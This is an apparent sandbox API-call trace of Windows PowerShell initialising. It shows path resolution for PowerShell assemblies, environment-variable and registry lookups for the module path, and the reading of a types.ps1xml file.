	[0051.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e154, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.966] GetLastError () returned 0x7a
	[0051.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.966] GetLastError () returned 0x7a
	[0051.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.966] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e154, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.967] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.967] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.967] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e168, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.967] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e118, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.967] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e118, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.967] GetLastError () returned 0x7a
	[0051.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22e118, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0051.968] GetLastError () returned 0x7a
	[0052.066] SetConsoleCtrlHandler (HandlerRoutine=0x1d6384a, Add=1) returned 1
	[0052.066] GetLastError () returned 0x7a
	[0052.076] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0052.076] GetLastError () returned 0x0
	[0052.077] CoCreateGuid (in: pguid=0x22e648 | out: pguid=0x22e648*(Data1=0x1e0ea214, Data2=0x4399, Data3=0x4119, Data4=([0]=0x80, [1]=0xde, [2]=0xd1, [3]=0x7b, [4]=0x78, [5]=0xf2, [6]=0xf, [7]=0x75))) returned 0x0
	[0052.142] WinSqmIsOptedIn () returned 0x0
	[0052.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.143] GetLastError () returned 0xcb
	[0052.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.147] GetLastError () returned 0xcb
	[0052.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.147] GetLastError () returned 0xcb
	[0052.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.149] GetLastError () returned 0xcb
	[0052.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.150] GetLastError () returned 0xcb
	[0052.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.155] GetLastError () returned 0xcb
	[0052.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.155] GetLastError () returned 0xcb
	[0052.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.156] GetLastError () returned 0xcb
	[0052.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.158] GetLastError () returned 0xcb
	[0052.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.165] GetLastError () returned 0xcb
	[0052.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.169] GetLastError () returned 0xcb
	[0052.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0052.170] GetLastError () returned 0xcb
	[0053.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.111] GetLastError () returned 0xcb
	[0053.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.112] GetLastError () returned 0xcb
	[0053.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.112] GetLastError () returned 0xcb
	[0053.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.112] GetLastError () returned 0xcb
	[0053.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.340] GetLastError () returned 0x3
	[0053.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.340] GetLastError () returned 0x3
	[0053.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.340] GetLastError () returned 0x3
	[0053.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.340] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0053.341] GetLastError () returned 0x3
	[0053.344] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0053.344] GetLastError () returned 0x3
	[0053.345] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3c3520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0053.345] GetLastError () returned 0x3
	[0053.345] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e460 | out: phkResult=0x22e460*=0x324) returned 0x0
	[0053.345] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22e4a4, lpData=0x0, lpcbData=0x22e4a0*=0x0 | out: lpType=0x22e4a4*=0x2, lpData=0x0, lpcbData=0x22e4a0*=0x6c) returned 0x0
	[0053.346] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22e4a4, lpData=0x3c3520, lpcbData=0x22e4a0*=0x6c | out: lpType=0x22e4a4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x22e4a0*=0x6c) returned 0x0
	[0053.346] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3c3520, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0053.346] GetLastError () returned 0x3
	[0053.346] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3c3520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0053.346] GetLastError () returned 0x3
	[0053.347] RegCloseKey (hKey=0x324) returned 0x0
	[0053.347] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3c3520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0053.347] GetLastError () returned 0x3
	[0053.347] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e460 | out: phkResult=0x22e460*=0x324) returned 0x0
	[0053.347] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22e4a4, lpData=0x0, lpcbData=0x22e4a0*=0x0 | out: lpType=0x22e4a4*=0x0, lpData=0x0, lpcbData=0x22e4a0*=0x0) returned 0x2
	[0053.348] RegCloseKey (hKey=0x324) returned 0x0
	[0053.422] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3c3520 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0053.423] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0x22dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0053.423] GetLastError () returned 0x3f0
	[0053.425] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0053.425] GetLastError () returned 0x3f0
	[0053.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0053.434] GetLastError () returned 0xcb
	[0053.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0053.436] GetLastError () returned 0xcb
	[0053.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0053.440] GetLastError () returned 0xcb
	[0053.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0053.440] GetLastError () returned 0xcb
	[0053.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e3e0 | out: phkResult=0x22e3e0*=0x32c) returned 0x0
	[0053.447] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x22e448, lpData=0x0, lpcbData=0x22e444*=0x0 | out: lpType=0x22e448*=0x1, lpData=0x0, lpcbData=0x22e444*=0x74) returned 0x0
	[0053.449] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x22e428, lpData=0x0, lpcbData=0x22e424*=0x0 | out: lpType=0x22e428*=0x1, lpData=0x0, lpcbData=0x22e424*=0x74) returned 0x0
	[0053.449] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x22e428, lpData=0x3c3520, lpcbData=0x22e424*=0x74 | out: lpType=0x22e428*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22e424*=0x74) returned 0x0
	[0053.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22dfa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0053.449] GetLastError () returned 0xcb
	[0053.449] SetErrorMode (uMode=0x1) returned 0x1
	[0053.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22e428 | out: lpFileInformation=0x22e428*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0053.449] GetLastError () returned 0xcb
	[0053.449] SetErrorMode (uMode=0x1) returned 0x1
	[0053.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0053.452] GetLastError () returned 0xcb
	[0053.452] SetErrorMode (uMode=0x1) returned 0x1
	[0053.453] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e41c | out: lpFileInformation=0x22e41c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0053.453] GetLastError () returned 0xcb
	[0053.453] SetErrorMode (uMode=0x1) returned 0x1
	[0053.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0053.455] GetLastError () returned 0xcb
	[0053.455] SetErrorMode (uMode=0x1) returned 0x1
	[0053.455] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e41c | out: lpFileInformation=0x22e41c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0053.455] GetLastError () returned 0xcb
	[0053.455] SetErrorMode (uMode=0x1) returned 0x1
	[0053.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0053.459] GetLastError () returned 0xcb
	[0053.460] GetACP () returned 0x4e4
	[0053.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0053.544] GetLastError () returned 0x0
	[0053.544] SetErrorMode (uMode=0x1) returned 0x1
	[0053.546] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0053.546] GetLastError () returned 0x0
	[0053.547] GetFileType (hFile=0x330) returned 0x1
	[0053.547] SetErrorMode (uMode=0x1) returned 0x1
	[0053.547] GetFileType (hFile=0x330) returned 0x1
	[0053.549] ReadFile (in: hFile=0x330, lpBuffer=0x20008c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x20008c4*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.550] GetLastError () returned 0x0
	[0053.551] ReadFile (in: hFile=0x330, lpBuffer=0x20008c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x20008c4*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.551] GetLastError () returned 0x0
	[0053.551] ReadFile (in: hFile=0x330, lpBuffer=0x20008c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x20008c4*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.551] GetLastError () returned 0x0
	[0053.552] ReadFile (in: hFile=0x330, lpBuffer=0x20008c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x20008c4*, lpNumberOfBytesRead=0x22e394*=0xcf3, lpOverlapped=0x0) returned 1
	[0053.552] GetLastError () returned 0x0
	[0053.553] ReadFile (in: hFile=0x330, lpBuffer=0x1fffd57, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x1fffd57*, lpNumberOfBytesRead=0x22e394*=0x0, lpOverlapped=0x0) returned 1
	[0053.553] GetLastError () returned 0x0
	[0053.553] ReadFile (in: hFile=0x330, lpBuffer=0x20008c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x20008c4*, lpNumberOfBytesRead=0x22e394*=0x0, lpOverlapped=0x0) returned 1
	[0053.553] GetLastError () returned 0x0
	[0053.553] CloseHandle (hObject=0x330) returned 1
	[0053.553] GetLastError () returned 0x0
	[0053.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0053.555] GetLastError () returned 0x0
	[0053.555] SetErrorMode (uMode=0x1) returned 0x1
